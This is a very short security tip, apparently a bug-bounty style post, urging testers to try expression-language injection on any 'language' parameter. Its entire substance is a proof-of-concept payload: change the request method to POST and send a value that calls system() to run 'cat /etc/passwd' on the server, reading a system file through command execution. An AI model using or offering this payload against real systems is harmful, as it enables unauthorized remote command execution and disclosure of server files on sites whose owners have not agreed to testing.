Quote

If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.

✅ POC Payload:

  1. Change the Method GET to POST
  2. language={${system("cat+/etc/passwd")}}